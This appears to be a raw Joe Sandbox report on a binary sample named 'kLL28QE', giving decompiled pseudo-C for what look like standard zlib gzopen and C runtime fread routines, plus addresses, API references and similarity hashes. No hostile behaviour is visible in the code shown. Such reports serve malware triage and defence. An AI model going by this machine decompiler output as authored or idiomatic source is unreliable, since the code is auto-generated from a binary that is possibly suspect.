                                                                                                                                                                                                      				void* _t104;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                      				_t91 = __eax;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                      					_t101 = _t100 + 4;
                                                                                                                                                                                                      					if(_t93 == 0) {
                                                                                                                                                                                                      						L31:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                      						 *_t93 = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                      						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                      						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                      						_t102 = _t101 + 0xc;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                      						_t87 = _t57 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t82 =  *_t57;
                                                                                                                                                                                                      							_t57 = _t57 + 1;
                                                                                                                                                                                                      						} while (_t82 != 0);
                                                                                                                                                                                                      						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                      						_t103 = _t102 + 4;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                      						if(_t60 == 0) {
                                                                                                                                                                                                      							L30:
                                                                                                                                                                                                      							E00405160(0, _t87, _t93);
                                                                                                                                                                                                      							goto L31;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                      							_t88 = _t60;
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							if( *_t91 == 0x72) {
                                                                                                                                                                                                      								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t63 =  *_t91;
                                                                                                                                                                                                      							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                      								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t64 =  *_t91;
                                                                                                                                                                                                      							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                      								__eflags = _t64 - 0x66;
                                                                                                                                                                                                      								if(_t64 != 0x66) {
                                                                                                                                                                                                      									__eflags = _t64 - 0x68;
                                                                                                                                                                                                      									if(_t64 != 0x68) {
                                                                                                                                                                                                      										__eflags = _t64 - 0x52;
                                                                                                                                                                                                      										if(_t64 != 0x52) {
                                                                                                                                                                                                      											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                      											 *_t89 = _t64;
                                                                                                                                                                                                      											_t87 = _t89 + 1;
                                                                                                                                                                                                      											__eflags = _t87;
                                                                                                                                                                                                      											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t98 = _t64 - 0x30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t91 = _t91 + 1;
                                                                                                                                                                                                      							if(_t64 == 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t87 = _t103 + 0x68;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                      								goto L9;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L26:
                                                                                                                                                                                                      							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                      							if(_t65 == 0) {
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(_t65 != 0x77) {
                                                                                                                                                                                                      									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                      									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                      									 *_t93 = _t66;
                                                                                                                                                                                                      									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                      									_t104 = _t103 + 0x14;
                                                                                                                                                                                                      									__eflags = _t67;
                                                                                                                                                                                                      									if(_t67 != 0) {
                                                                                                                                                                                                      										goto L30;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L34;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_push(0x38);
                                                                                                                                                                                                      									_push("1.2.3");
                                                                                                                                                                                                      									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                      									_push(8);
                                                                                                                                                                                                      									_push(0xfffffff1);
                                                                                                                                                                                                      									_push(8);
                                                                                                                                                                                                      									_push(_t98);
                                                                                                                                                                                                      									_push(_t93);
                                                                                                                                                                                                      									_t91 = E00404CE0();
                                                                                                                                                                                                      									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                      									_t104 = _t103 + 0x24;
                                                                                                                                                                                                      									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                      									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                      									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                      										goto L30;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                      										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                      										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										_push(_t104 + 0x18);
                                                                                                                                                                                                      										if(__eflags >= 0) {
                                                                                                                                                                                                      											_push(_t69);
                                                                                                                                                                                                      											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                      											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                      											_t70 = E0040CB9D();
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                      										__eflags = _t70;
                                                                                                                                                                                                      										if(_t70 == 0) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                      											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                      												E00405000(_t93, 0);
                                                                                                                                                                                                      												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                      												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                      												__eflags = _t74;
                                                                                                                                                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                      												return _t93;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                      												return _t93;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L42;
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t62 =  *_t83;
                                                                                                                                                                                                      							 *_t88 = _t62;
                                                                                                                                                                                                      							_t83 = _t83 + 1;
                                                                                                                                                                                                      							_t88 = _t88 + 1;
                                                                                                                                                                                                      							if(_t62 != 0) {
                                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L42:
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x00405885
                                                                                                                                                                                                      0x00405889
                                                                                                                                                                                                      0x00405897
                                                                                                                                                                                                      0x00405899
                                                                                                                                                                                                      0x004058a5
                                                                                                                                                                                                      0x004058a7
                                                                                                                                                                                                      0x004058b3
                                                                                                                                                                                                      0x004058b5
                                                                                                                                                                                                      0x004058c1
                                                                                                                                                                                                      0x004058c5
                                                                                                                                                                                                      0x004058c7
                                                                                                                                                                                                      0x004058c7
                                                                                                                                                                                                      0x004058c8
                                                                                                                                                                                                      0x004058b7
                                                                                                                                                                                                      0x004058b7
                                                                                                                                                                                                      0x004058b7
                                                                                                                                                                                                      0x004058a9
                                                                                                                                                                                                      0x004058a9
                                                                                                                                                                                                      0x004058a9
                                                                                                                                                                                                      0x0040589b
                                                                                                                                                                                                      0x0040589b
                                                                                                                                                                                                      0x0040589b
                                                                                                                                                                                                      0x0040588f
                                                                                                                                                                                                      0x00405892
                                                                                                                                                                                                      0x00405892
                                                                                                                                                                                                      0x004058cc
                                                                                                                                                                                                      0x004058cf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004058d1
                                                                                                                                                                                                      0x004058d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004058db
                                                                                                                                                                                                      0x004058db
                                                                                                                                                                                                      0x004058e0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004058e2
                                                                                                                                                                                                      0x004058e4
                                                                                                                                                                                                      0x00405930
                                                                                                                                                                                                      0x0040593f
                                                                                                                                                                                                      0x00405942
                                                                                                                                                                                                      0x00405944
                                                                                                                                                                                                      0x00405949
                                                                                                                                                                                                      0x0040594c
                                                                                                                                                                                                      0x0040594e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405950
                                                                                                                                                                                                      0x00405950
                                                                                                                                                                                                      0x00405953
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405953
                                                                                                                                                                                                      0x004058e6
                                                                                                                                                                                                      0x004058ea
                                                                                                                                                                                                      0x004058ec
                                                                                                                                                                                                      0x004058f1
                                                                                                                                                                                                      0x004058f2
                                                                                                                                                                                                      0x004058f4
                                                                                                                                                                                                      0x004058f6
                                                                                                                                                                                                      0x004058f8
                                                                                                                                                                                                      0x004058f9
                                                                                                                                                                                                      0x00405904
                                                                                                                                                                                                      0x00405906
                                                                                                                                                                                                      0x0040590b
                                                                                                                                                                                                      0x0040590e
                                                                                                                                                                                                      0x00405911
                                                                                                                                                                                                      0x00405916
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405955
                                                                                                                                                                                                      0x00405955
                                                                                                                                                                                                      0x00405955
                                                                                                                                                                                                      0x00405961
                                                                                                                                                                                                      0x00405963
                                                                                                                                                                                                      0x00405967
                                                                                                                                                                                                      0x0040596d
                                                                                                                                                                                                      0x0040596e
                                                                                                                                                                                                      0x0040597c
                                                                                                                                                                                                      0x0040597d
                                                                                                                                                                                                      0x00405970
                                                                                                                                                                                                      0x00405970
                                                                                                                                                                                                      0x00405974
                                                                                                                                                                                                      0x00405975
                                                                                                                                                                                                      0x00405975
                                                                                                                                                                                                      0x00405985
                                                                                                                                                                                                      0x00405988
                                                                                                                                                                                                      0x0040598a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040598c
                                                                                                                                                                                                      0x0040598c
                                                                                                                                                                                                      0x00405990
                                                                                                                                                                                                      0x004059a5
                                                                                                                                                                                                      0x004059ad
                                                                                                                                                                                                      0x004059b6
                                                                                                                                                                                                      0x004059b6
                                                                                                                                                                                                      0x004059b9
                                                                                                                                                                                                      0x004059c5
                                                                                                                                                                                                      0x00405992
                                                                                                                                                                                                      0x00405992
                                                                                                                                                                                                      0x004059a2
                                                                                                                                                                                                      0x004059a2
                                                                                                                                                                                                      0x00405990
                                                                                                                                                                                                      0x0040598a
                                                                                                                                                                                                      0x00405916
                                                                                                                                                                                                      0x004058e4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405860
                                                                                                                                                                                                      0x00405860
                                                                                                                                                                                                      0x00405862
                                                                                                                                                                                                      0x00405864
                                                                                                                                                                                                      0x00405865
                                                                                                                                                                                                      0x00405868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040586a
                                                                                                                                                                                                      0x0040586a
                                                                                                                                                                                                      0x0040586d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00405868
                                                                                                                                                                                                      0x0040584f
                                                                                                                                                                                                      0x004057ea
                                                                                                                                                                                                      0x00000000

APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Memory Dump Source
• Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
Yara matches
Similarity
• API ID: _malloc$AllocateHeap
• String ID: 1.2.3
• API String ID: 680241177-2310465506
• Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
• Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
• Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
• Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                                      			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t90;
                                                                                                                                                                                                      				intOrPtr* _t92;
                                                                                                                                                                                                      				signed int _t94;
                                                                                                                                                                                                      				char _t97;
                                                                                                                                                                                                      				signed int _t105;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				signed int _t107;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      				signed int _t113;
                                                                                                                                                                                                      				intOrPtr* _t114;
                                                                                                                                                                                                      				signed int _t118;
                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                      				char* _t121;
                                                                                                                                                                                                      				signed int _t125;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t133;
                                                                                                                                                                                                      				void* _t134;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t125 = __edx;
                                                                                                                                                                                                      				_t121 = _a4;
                                                                                                                                                                                                      				_t119 = _a8;
                                                                                                                                                                                                      				_t131 = 0;
                                                                                                                                                                                                      				_v12 = _t121;
                                                                                                                                                                                                      				_v8 = _t119;
                                                                                                                                                                                                      				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = _t121;
                                                                                                                                                                                                      					if(_t121 != 0) {
                                                                                                                                                                                                      						_t133 = _a20;
                                                                                                                                                                                                      						__eflags = _t133;
                                                                                                                                                                                                      						if(_t133 == 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							__eflags = _t119 - 0xffffffff;
                                                                                                                                                                                                      							if(_t119 != 0xffffffff) {
                                                                                                                                                                                                      								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                                                                                                                                                      								_t134 = _t134 + 0xc;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t133 - _t131;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t94 = _t90 | 0xffffffff;
                                                                                                                                                                                                      								_t125 = _t94 % _a12;
                                                                                                                                                                                                      								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                                                                                      									goto L3;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L13:
                                                                                                                                                                                                      								_t131 = _a12 * _a16;
                                                                                                                                                                                                      								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                      								_v20 = _t131;
                                                                                                                                                                                                      								_t120 = _t131;
                                                                                                                                                                                                      								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                      									_v16 = 0x1000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t131;
                                                                                                                                                                                                      								if(_t131 == 0) {
                                                                                                                                                                                                      									L40:
                                                                                                                                                                                                      									return _a16;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                      										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                      											L24:
                                                                                                                                                                                                      											__eflags = _t120 - _v16;
                                                                                                                                                                                                      											if(_t120 < _v16) {
                                                                                                                                                                                                      												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                      												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                      												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                      													L48:
                                                                                                                                                                                                      													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags = _v8;
                                                                                                                                                                                                      												if(_v8 == 0) {
                                                                                                                                                                                                      													L44:
                                                                                                                                                                                                      													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                      													if(__eflags != 0) {
                                                                                                                                                                                                      														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                      														_t134 = _t134 + 0xc;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													L4:
                                                                                                                                                                                                      													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                      													goto L5;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t123 = _v12;
                                                                                                                                                                                                      												_v12 = _v12 + 1;
                                                                                                                                                                                                      												 *_v12 = _t97;
                                                                                                                                                                                                      												_t120 = _t120 - 1;
                                                                                                                                                                                                      												_t70 =  &_v8;
                                                                                                                                                                                                      												 *_t70 = _v8 - 1;
                                                                                                                                                                                                      												__eflags =  *_t70;
                                                                                                                                                                                                      												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _v16;
                                                                                                                                                                                                      											if(_v16 == 0) {
                                                                                                                                                                                                      												_t105 = 0x7fffffff;
                                                                                                                                                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                      												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                      													_t105 = _t120;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                      												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                      													_t55 = _t120 % _v16;
                                                                                                                                                                                                      													__eflags = _t55;
                                                                                                                                                                                                      													_t125 = _t55;
                                                                                                                                                                                                      													_t110 = _t120;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                      													_t110 = 0x7fffffff;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t105 = _t110 - _t125;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t105 - _v8;
                                                                                                                                                                                                      											if(_t105 > _v8) {
                                                                                                                                                                                                      												goto L44;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_push(_t105);
                                                                                                                                                                                                      												_push(_v12);
                                                                                                                                                                                                      												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                      												_pop(_t123);
                                                                                                                                                                                                      												_push(_t106);
                                                                                                                                                                                                      												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                      												_t134 = _t134 + 0xc;
                                                                                                                                                                                                      												__eflags = _t107;
                                                                                                                                                                                                      												if(_t107 == 0) {
                                                                                                                                                                                                      													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                      													goto L48;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                      												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                      													L47:
                                                                                                                                                                                                      													_t80 = _t133 + 0xc;
                                                                                                                                                                                                      													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                      													__eflags =  *_t80;
                                                                                                                                                                                                      													goto L48;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_v12 = _v12 + _t107;
                                                                                                                                                                                                      												_t120 = _t120 - _t107;
                                                                                                                                                                                                      												_v8 = _v8 - _t107;
                                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                      										__eflags = _t113;
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L24;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if(__eflags < 0) {
                                                                                                                                                                                                      											goto L47;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t131 = _t120;
                                                                                                                                                                                                      										__eflags = _t120 - _t113;
                                                                                                                                                                                                      										if(_t120 >= _t113) {
                                                                                                                                                                                                      											_t131 = _t113;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t131 - _v8;
                                                                                                                                                                                                      										if(_t131 > _v8) {
                                                                                                                                                                                                      											_t133 = 0;
                                                                                                                                                                                                      											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                      												_t134 = _t134 + 0xc;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											 *_t114 = 0x22;
                                                                                                                                                                                                      											_push(_t133);
                                                                                                                                                                                                      											goto L4;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                      											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                      											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                      											_v12 = _v12 + _t131;
                                                                                                                                                                                                      											_t120 = _t120 - _t131;
                                                                                                                                                                                                      											_t134 = _t134 + 0x10;
                                                                                                                                                                                                      											_v8 = _v8 - _t131;
                                                                                                                                                                                                      											_t131 = _v20;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L39:
                                                                                                                                                                                                      										__eflags = _t120;
                                                                                                                                                                                                      									} while (_t120 != 0);
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                      						_t90 = _t118 / _a12;
                                                                                                                                                                                                      						_t125 = _t118 % _a12;
                                                                                                                                                                                                      						__eflags = _a16 - _t90;
                                                                                                                                                                                                      						if(_a16 <= _t90) {
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					 *_t92 = 0x16;
                                                                                                                                                                                                      					_push(_t131);
                                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























                                                                                                                                                                                                      0x0040be33
                                                                                                                                                                                                      0x0040be37
                                                                                                                                                                                                      0x0040be87
                                                                                                                                                                                                      0x0040be87
                                                                                                                                                                                                      0x0040be8b
                                                                                                                                                                                                      0x0040be95
                                                                                                                                                                                                      0x0040be9a
                                                                                                                                                                                                      0x0040be9a
                                                                                                                                                                                                      0x0040bea2
                                                                                                                                                                                                      0x0040beaa
                                                                                                                                                                                                      0x0040beab
                                                                                                                                                                                                      0x0040beac
                                                                                                                                                                                                      0x0040bead
                                                                                                                                                                                                      0x0040beae
                                                                                                                                                                                                      0x0040bcf9
                                                                                                                                                                                                      0x0040bcf9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bcfe
                                                                                                                                                                                                      0x0040be39
                                                                                                                                                                                                      0x0040be3c
                                                                                                                                                                                                      0x0040be3f
                                                                                                                                                                                                      0x0040be44
                                                                                                                                                                                                      0x0040be45
                                                                                                                                                                                                      0x0040be45
                                                                                                                                                                                                      0x0040be45
                                                                                                                                                                                                      0x0040be48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040be48
                                                                                                                                                                                                      0x0040bdbb
                                                                                                                                                                                                      0x0040bdbf
